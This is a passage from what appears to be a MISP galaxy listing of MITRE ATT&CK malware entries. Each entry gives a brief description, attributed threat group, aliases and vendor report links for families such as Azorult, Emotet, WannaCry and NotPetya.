[PowerStallion](https://attack.mitre.org/software/S0393) is a lightweight [PowerShell](https://attack.mitre.org/techniques/T1059/001) backdoor used by [Turla](https://attack.mitre.org/groups/G0010), possibly as a recovery access tool to install other backdoors.(Citation: ESET Turla PowerShell May 2019)

The tag is: misp-galaxy:mitre-malware="PowerStallion - S0393"

PowerStallion - S0393 is also known as:

  • PowerStallion

Table 7688. Table References

Links

https://attack.mitre.org/software/S0393

https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

MESSAGETAP - S0443

[MESSAGETAP](https://attack.mitre.org/software/S0443) is a data mining malware family deployed by [APT41](https://attack.mitre.org/groups/G0096) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. (Citation: FireEye MESSAGETAP October 2019)

The tag is: misp-galaxy:mitre-malware="MESSAGETAP - S0443"

MESSAGETAP - S0443 is also known as:

  • MESSAGETAP

Table 7689. Table References

Links

https://attack.mitre.org/software/S0443

https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html

Azorult - S0344

[Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016. In July 2018, [Azorult](https://attack.mitre.org/software/S0344) was used in a spearphishing campaign against targets in North America. [Azorult](https://attack.mitre.org/software/S0344) has also been used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)

The tag is: misp-galaxy:mitre-malware="Azorult - S0344"

Azorult - S0344 is also known as:

  • Azorult

Table 7690. Table References

Links

https://attack.mitre.org/software/S0344

https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/

https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside

PLEAD - S0435

[PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two. [PLEAD](https://attack.mitre.org/software/S0435) was observed in use as early as March 2017.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018)

The tag is: misp-galaxy:mitre-malware="PLEAD - S0435"

PLEAD - S0435 is also known as:

  • PLEAD

Table 7691. Table References

Links

https://attack.mitre.org/software/S0435

https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/

https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/

https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html

Bazar - S0534

[Bazar](https://attack.mitre.org/software/S0534) is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://attack.mitre.org/software/S0534) reportedly has ties to [TrickBot](https://attack.mitre.org/software/S0266) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.(Citation: Cybereason Bazar July 2020)

The tag is: misp-galaxy:mitre-malware="Bazar - S0534"

Bazar - S0534 is also known as:

  • Bazar

  • KEGTAP

  • Team9

Table 7692. Table References

Links

https://attack.mitre.org/software/S0534

https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

Denis - S0354

[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050). [Denis](https://attack.mitre.org/software/S0354) shares several similarities with the [SOUNDBITE](https://attack.mitre.org/software/S0157) backdoor and has been used in conjunction with the [Goopy](https://attack.mitre.org/software/S0477) backdoor.(Citation: Cybereason Oceanlotus May 2017)

The tag is: misp-galaxy:mitre-malware="Denis - S0354"

Denis - S0354 is also known as:

  • Denis

Table 7693. Table References

Links

https://attack.mitre.org/software/S0354

https://www.cybereason.com/blog/operation-cobalt-kitty-apt

Pony - S0453

[Pony](https://attack.mitre.org/software/S0453) is credential-stealing malware, though it has also been used by adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 was leaked online, leading to its use by various threat actors.(Citation: Malwarebytes Pony April 2016)

The tag is: misp-galaxy:mitre-malware="Pony - S0453"

Pony - S0453 is also known as:

  • Pony

Table 7694. Table References

Links

https://attack.mitre.org/software/S0453

https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/

Seasalt - S0345

[Seasalt](https://attack.mitre.org/software/S0345) is malware that has been linked to [APT1](https://attack.mitre.org/groups/G0006)'s 2010 operations. It shares some code similarities with [OceanSalt](https://attack.mitre.org/software/S0346).(Citation: Mandiant APT1 Appendix)(Citation: McAfee Oceansalt Oct 2018)

The tag is: misp-galaxy:mitre-malware="Seasalt - S0345"

Seasalt - S0345 is also known as:

  • Seasalt

Table 7695. Table References

Links

https://attack.mitre.org/software/S0345

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf

Spark - S0543

[Spark](https://attack.mitre.org/software/S0543) is a Windows backdoor and has been in use since as early as 2017.(Citation: Unit42 Molerat Mar 2020)

The tag is: misp-galaxy:mitre-malware="Spark - S0543"

Spark - S0543 is also known as:

  • Spark

Table 7696. Table References

Links

https://attack.mitre.org/software/S0543

https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/

INSOMNIA - S0463

[INSOMNIA](https://attack.mitre.org/software/S0463) is spyware that has been used by the group Evil Eye.(Citation: Volexity Insomnia)

The tag is: misp-galaxy:mitre-malware="INSOMNIA - S0463"

INSOMNIA - S0463 is also known as:

  • INSOMNIA

Table 7697. Table References

Links

https://attack.mitre.org/software/S0463

https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/

TSCookie - S0436

[TSCookie](https://attack.mitre.org/software/S0436) is a remote access tool (RAT) that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) in campaigns against Japanese targets.(Citation: JPCert TSCookie March 2018)(Citation: JPCert BlackTech Malware September 2019) [TSCookie](https://attack.mitre.org/software/S0436) has been referred to as [PLEAD](https://attack.mitre.org/software/S0435), though more recent reporting indicates a separation between the two.(Citation: JPCert PLEAD Downloader June 2018)(Citation: JPCert BlackTech Malware September 2019)

The tag is: misp-galaxy:mitre-malware="TSCookie - S0436"

TSCookie - S0436 is also known as:

  • TSCookie

Table 7698. Table References

Links

https://attack.mitre.org/software/S0436

https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html

https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html

EnvyScout - S0634

[EnvyScout](https://attack.mitre.org/software/S0634) is a dropper that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)

The tag is: misp-galaxy:mitre-malware="EnvyScout - S0634"

EnvyScout - S0634 is also known as:

  • EnvyScout

Table 7699. Table References

Links

https://attack.mitre.org/software/S0634

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

OceanSalt - S0346

[OceanSalt](https://attack.mitre.org/software/S0346) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://attack.mitre.org/software/S0346) shares code similarity with [SpyNote RAT](https://attack.mitre.org/software/S0305), which has been linked to [APT1](https://attack.mitre.org/groups/G0006).(Citation: McAfee Oceansalt Oct 2018)

The tag is: misp-galaxy:mitre-malware="OceanSalt - S0346"

OceanSalt - S0346 is also known as:

  • OceanSalt

Table 7700. Table References

Links

https://attack.mitre.org/software/S0346

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf

Peppy - S0643

[Peppy](https://attack.mitre.org/software/S0643) is a Python-based remote access Trojan, active since at least 2012, with similarities to [Crimson](https://attack.mitre.org/software/S0115).(Citation: Proofpoint Operation Transparent Tribe March 2016)

The tag is: misp-galaxy:mitre-malware="Peppy - S0643"

Peppy - S0643 is also known as:

  • Peppy

Table 7701. Table References

Links

https://attack.mitre.org/software/S0643

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

AuditCred - S0347

[AuditCred](https://attack.mitre.org/software/S0347) is a malicious DLL that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) during their 2018 attacks.(Citation: TrendMicro Lazarus Nov 2018)

The tag is: misp-galaxy:mitre-malware="AuditCred - S0347"

AuditCred - S0347 is also known as:

  • AuditCred

  • Roptimizer

Table 7702. Table References

Links

https://attack.mitre.org/software/S0347

https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/

Avenger - S0473

[Avenger](https://attack.mitre.org/software/S0473) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="Avenger - S0473"

Avenger - S0473 is also known as:

  • Avenger

Table 7703. Table References

Links

https://attack.mitre.org/software/S0473

https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

Kivars - S0437

[Kivars](https://attack.mitre.org/software/S0437) is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by [BlackTech](https://attack.mitre.org/groups/G0098) in a 2010 campaign.(Citation: TrendMicro BlackTech June 2017)

The tag is: misp-galaxy:mitre-malware="Kivars - S0437"

Kivars - S0437 is also known as:

  • Kivars

Table 7704. Table References

Links

https://attack.mitre.org/software/S0437

https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/

SpeakUp - S0374

[SpeakUp](https://attack.mitre.org/software/S0374) is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. (Citation: CheckPoint SpeakUp Feb 2019)

The tag is: misp-galaxy:mitre-malware="SpeakUp - S0374"

SpeakUp - S0374 is also known as:

  • SpeakUp

Table 7705. Table References

Links

https://attack.mitre.org/software/S0374

https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/

Attor - S0438

[Attor](https://attack.mitre.org/software/S0438) is a Windows-based espionage platform that has been seen in use since 2013. [Attor](https://attack.mitre.org/software/S0438) has a loadable plugin architecture to customize functionality for specific targets.(Citation: ESET Attor Oct 2019)

The tag is: misp-galaxy:mitre-malware="Attor - S0438"

Attor - S0438 is also known as:

  • Attor

Table 7706. Table References

Links

https://attack.mitre.org/software/S0438

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf

IcedID - S0483

[IcedID](https://attack.mitre.org/software/S0483) is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. [IcedID](https://attack.mitre.org/software/S0483) has been downloaded by [Emotet](https://attack.mitre.org/software/S0367) in multiple campaigns.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)

The tag is: misp-galaxy:mitre-malware="IcedID - S0483"

IcedID - S0483 is also known as:

  • IcedID

Table 7707. Table References

Links

https://attack.mitre.org/software/S0483

https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware

https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/

Dridex - S0384

[Dridex](https://attack.mitre.org/software/S0384) is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated [Dridex](https://attack.mitre.org/software/S0384) had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. [Dridex](https://attack.mitre.org/software/S0384) was created from the source code of the Bugat banking Trojan (also known as Cridex).(Citation: Dell Dridex Oct 2015)(Citation: Kaspersky Dridex May 2017)(Citation: Treasury EvilCorp Dec 2019)

The tag is: misp-galaxy:mitre-malware="Dridex - S0384"

Dridex - S0384 is also known as:

  • Dridex

  • Bugat v5

Table 7708. Table References

Links

https://attack.mitre.org/software/S0384

https://home.treasury.gov/news/press-releases/sm845

https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/

https://securelist.com/dridex-a-history-of-evolution/78531/

https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation

GoldenSpy - S0493

[GoldenSpy](https://attack.mitre.org/software/S0493) is backdoor malware that has been packaged with legitimate tax preparation software. [GoldenSpy](https://attack.mitre.org/software/S0493) was discovered targeting organizations in China, being delivered with the "Intelligent Tax" software suite, which is produced by the Golden Tax Department of Aisino Credit Information Co. and is required to pay local taxes.(Citation: Trustwave GoldenSpy June 2020)

The tag is: misp-galaxy:mitre-malware="GoldenSpy - S0493"

GoldenSpy - S0493 is also known as:

  • GoldenSpy

Table 7709. Table References

Links

https://attack.mitre.org/software/S0493

https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/

HiddenWasp - S0394

[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.(Citation: Intezer HiddenWasp Map 2019)

The tag is: misp-galaxy:mitre-malware="HiddenWasp - S0394"

HiddenWasp - S0394 is also known as:

  • HiddenWasp

Table 7710. Table References

Links

https://attack.mitre.org/software/S0394

https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/

Okrum - S0439

[Okrum](https://attack.mitre.org/software/S0439) is a Windows backdoor that has been seen in use since December 2016 with strong links to [Ke3chang](https://attack.mitre.org/groups/G0004).(Citation: ESET Okrum July 2019)

The tag is: misp-galaxy:mitre-malware="Okrum - S0439"

Okrum - S0439 is also known as:

  • Okrum

Table 7711. Table References

Links

https://attack.mitre.org/software/S0439

https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf

MoleNet - S0553

[MoleNet](https://attack.mitre.org/software/S0553) is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.(Citation: Cybereason Molerats Dec 2020)

The tag is: misp-galaxy:mitre-malware="MoleNet - S0553"

MoleNet - S0553 is also known as:

  • MoleNet

Table 7712. Table References

Links

https://attack.mitre.org/software/S0553

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

BoomBox - S0635

[BoomBox](https://attack.mitre.org/software/S0635) is a downloader responsible for executing next stage components that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)

The tag is: misp-galaxy:mitre-malware="BoomBox - S0635"

BoomBox - S0635 is also known as:

  • BoomBox

Table 7713. Table References

Links

https://attack.mitre.org/software/S0635

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

xCaon - S0653

[xCaon](https://attack.mitre.org/software/S0653) is an HTTP variant of the [BoxCaon](https://attack.mitre.org/software/S0651) malware family that has been used by [IndigoZebra](https://attack.mitre.org/groups/G0136) since at least 2014. [xCaon](https://attack.mitre.org/software/S0653) has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)

The tag is: misp-galaxy:mitre-malware="xCaon - S0653"

xCaon - S0653 is also known as:

  • xCaon

Table 7714. Table References

Links

https://attack.mitre.org/software/S0653

https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

https://securelist.com/apt-trends-report-q2-2017/79332/

GPlayed - S0536

[GPlayed](https://attack.mitre.org/software/S0536) is an Android trojan with a broad range of capabilities.(Citation: Talos GPlayed)

The tag is: misp-galaxy:mitre-malware="GPlayed - S0536"

GPlayed - S0536 is also known as:

  • GPlayed

Table 7715. Table References

Links

https://attack.mitre.org/software/S0536

https://blog.talosintelligence.com/2018/10/gplayedtrojan.html

KONNI - S0356

[KONNI](https://attack.mitre.org/software/S0356) is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Talos Konni May 2017)(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)

The tag is: misp-galaxy:mitre-malware="KONNI - S0356"

KONNI - S0356 is also known as:

  • KONNI

Table 7716. Table References

Links

https://attack.mitre.org/software/S0356

https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/

https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html

https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b

https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/

https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/

HyperStack - S0537

[HyperStack](https://attack.mitre.org/software/S0537) is an RPC-based backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2018. [HyperStack](https://attack.mitre.org/software/S0537) has similarities to other backdoors used by [Turla](https://attack.mitre.org/groups/G0010) including [Carbon](https://attack.mitre.org/software/S0335).(Citation: Accenture HyperStack October 2020)

The tag is: misp-galaxy:mitre-malware="HyperStack - S0537"

HyperStack - S0537 is also known as:

  • HyperStack

Table 7717. Table References

Links

https://attack.mitre.org/software/S0537

https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity

Remexi - S0375

[Remexi](https://attack.mitre.org/software/S0375) is a Windows-based Trojan that was developed in the C programming language.(Citation: Securelist Remexi Jan 2019)

The tag is: misp-galaxy:mitre-malware="Remexi - S0375"

Remexi - S0375 is also known as:

  • Remexi

Table 7718. Table References

Links

https://attack.mitre.org/software/S0375

https://securelist.com/chafer-used-remexi-malware/89538/

njRAT - S0385

[njRAT](https://attack.mitre.org/software/S0385) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.(Citation: Fidelis njRAT June 2013)

The tag is: misp-galaxy:mitre-malware="njRAT - S0385"

njRAT - S0385 is also known as:

  • njRAT

  • Njw0rm

  • LV

  • Bladabindi

Table 7719. Table References

Links

https://attack.mitre.org/software/S0385

https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/

https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html

https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf

Crutch - S0538

[Crutch](https://attack.mitre.org/software/S0538) is a backdoor designed for document theft that has been used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2015.(Citation: ESET Crutch December 2020)

The tag is: misp-galaxy:mitre-malware="Crutch - S0538"

Crutch - S0538 is also known as:

  • Crutch

Table 7720. Table References

Links

https://attack.mitre.org/software/S0538

https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/

Pysa - S0583

[Pysa](https://attack.mitre.org/software/S0583) is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.(Citation: CERT-FR PYSA April 2020)

The tag is: misp-galaxy:mitre-malware="Pysa - S0583"

Pysa - S0583 is also known as:

  • Pysa

  • Mespinoza

Table 7721. Table References

Links

https://attack.mitre.org/software/S0583

https://digital.nhs.uk/cyber-alerts/2020/cc-3633

https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf

ECCENTRICBANDWAGON - S0593

[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool, with keylogging and screen capture functionality, used for information gathering on compromised systems.(Citation: CISA EB Aug 2020)

The tag is: misp-galaxy:mitre-malware="ECCENTRICBANDWAGON - S0593"

ECCENTRICBANDWAGON - S0593 is also known as:

  • ECCENTRICBANDWAGON

Table 7722. Table References

Links

https://attack.mitre.org/software/S0593

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a

LightNeuron - S0395

[LightNeuron](https://attack.mitre.org/software/S0395) is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. [LightNeuron](https://attack.mitre.org/software/S0395) has been used by [Turla](https://attack.mitre.org/groups/G0010) to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of [LightNeuron](https://attack.mitre.org/software/S0395) exists.(Citation: ESET LightNeuron May 2019)

The tag is: misp-galaxy:mitre-malware="LightNeuron - S0395"

LightNeuron - S0395 is also known as:

  • LightNeuron

Table 7723. Table References

Links

https://attack.mitre.org/software/S0395

https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf

WannaCry - S0366

[WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017)

The tag is: misp-galaxy:mitre-malware="WannaCry - S0366"

WannaCry - S0366 is also known as:

  • WannaCry

  • WanaCry

  • WanaCrypt

  • WanaCrypt0r

  • WCry

Table 7724. Table References

Links

https://attack.mitre.org/software/S0366

https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/

https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html

https://www.secureworks.com/research/wcry-ransomware-analysis

https://www.us-cert.gov/ncas/alerts/TA17-132A

https://www.washingtonpost.com/business/economy/more-than-150-countries-affected-by-massive-cyberattack-europol-says/2017/05/14/5091465e-3899-11e7-9e48-c4f199710b69_story.html?utm_term=.7fa16b41cad4

VaporRage - S0636

[VaporRage](https://attack.mitre.org/software/S0636) is a shellcode downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)

The tag is: misp-galaxy:mitre-malware="VaporRage - S0636"

VaporRage - S0636 is also known as:

  • VaporRage

Table 7725. Table References

Links

https://attack.mitre.org/software/S0636

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

SysUpdate - S0663

[SysUpdate](https://attack.mitre.org/software/S0663) is a backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2020.(Citation: Trend Micro Iron Tiger April 2021)

The tag is: misp-galaxy:mitre-malware="SysUpdate - S0663"

SysUpdate - S0663 is also known as:

  • SysUpdate

  • HyperSSL

  • Soldier

  • FOCUSFJORD

Table 7726. Table References

Links

https://attack.mitre.org/software/S0663

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

DarkWatchman - S0673

[DarkWatchman](https://attack.mitre.org/software/S0673) is a lightweight JavaScript-based remote access tool (RAT) that avoids file operations; it was first observed in November 2021.(Citation: Prevailion DarkWatchman 2021)

The tag is: misp-galaxy:mitre-malware="DarkWatchman - S0673"

DarkWatchman - S0673 is also known as:

  • DarkWatchman

Table 7727. Table References

Links

https://attack.mitre.org/software/S0673

https://www.prevailion.com/darkwatchman-new-fileless-techniques/

Emotet - S0367

[Emotet](https://attack.mitre.org/software/S0367) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://attack.mitre.org/software/S0266) and [IcedID](https://attack.mitre.org/software/S0483). Emotet first emerged in June 2014 and has been primarily used to target the banking sector. (Citation: Trend Micro Banking Malware Jan 2019)

The tag is: misp-galaxy:mitre-malware="Emotet - S0367"

Emotet - S0367 is also known as:

  • Emotet

  • Geodo

Table 7728. Table References

Links

https://attack.mitre.org/software/S0367

https://blog.talosintelligence.com/2019/01/return-of-emotet.html

https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/

https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf

https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/

https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/

https://support.malwarebytes.com/docs/DOC-2295

https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/

https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/

https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html

https://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreader

https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor

https://www.us-cert.gov/ncas/alerts/TA18-201A

https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/

HOPLIGHT - S0376

[HOPLIGHT](https://attack.mitre.org/software/S0376) is a backdoor Trojan that has reportedly been used by the North Korean government.(Citation: US-CERT HOPLIGHT Apr 2019)

The tag is: misp-galaxy:mitre-malware="HOPLIGHT - S0376"

HOPLIGHT - S0376 is also known as:

  • HOPLIGHT

Table 7729. Table References

Links

https://attack.mitre.org/software/S0376

https://www.us-cert.gov/ncas/analysis-reports/AR19-100A

NativeZone - S0637

[NativeZone](https://attack.mitre.org/software/S0637) is the name given collectively to disposable custom [Cobalt Strike](https://attack.mitre.org/software/S0154) loaders used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)(Citation: SentinelOne NobleBaron June 2021)

The tag is: misp-galaxy:mitre-malware="NativeZone - S0637"

NativeZone - S0637 is also known as:

  • NativeZone

Table 7730. Table References

Links

https://attack.mitre.org/software/S0637

https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

Babuk - S0638

[Babuk](https://attack.mitre.org/software/S0638) is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of [Babuk](https://attack.mitre.org/software/S0638) employ a "Big Game Hunting" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: CyberScoop Babuk February 2021)

The tag is: misp-galaxy:mitre-malware="Babuk - S0638"

Babuk - S0638 is also known as:

  • Babuk

  • Babyk

  • Vasa Locker

Table 7731. Table References

Links

https://attack.mitre.org/software/S0638

https://www.cyberscoop.com/babuk-ransomware-serco-attack/

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf

https://www.sogeti.com/globalassets/reports/cybersecchronicles-_babuk.pdf

https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html

NotPetya - S0368

[NotPetya](https://attack.mitre.org/software/S0368) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://attack.mitre.org/software/S0368) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)

The tag is: misp-galaxy:mitre-malware="NotPetya - S0368"

NotPetya - S0368 is also known as:

  • NotPetya

  • ExPetr

  • Diskcoder.C

  • GoldenEye

  • Petrwrap

  • Nyetya

Table 7732. Table References

Links

https://attack.mitre.org/software/S0368

https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html

https://www.justice.gov/opa/press-release/file/1328521/download

https://www.us-cert.gov/ncas/alerts/TA17-181A

https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/

Ursnif - S0386

[Ursnif](https://attack.mitre.org/software/S0386) is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)s, and malicious links.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016) [Ursnif](https://attack.mitre.org/software/S0386) is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.(Citation: TrendMicro Ursnif Mar 2015)

The tag is: misp-galaxy:mitre-malware="Ursnif - S0386"

Ursnif - S0386 is also known as:

  • Ursnif

  • Gozi-ISFB

  • PE_URSNIF

  • Dreambot

Table 7733. Table References

Links

https://attack.mitre.org/software/S0386

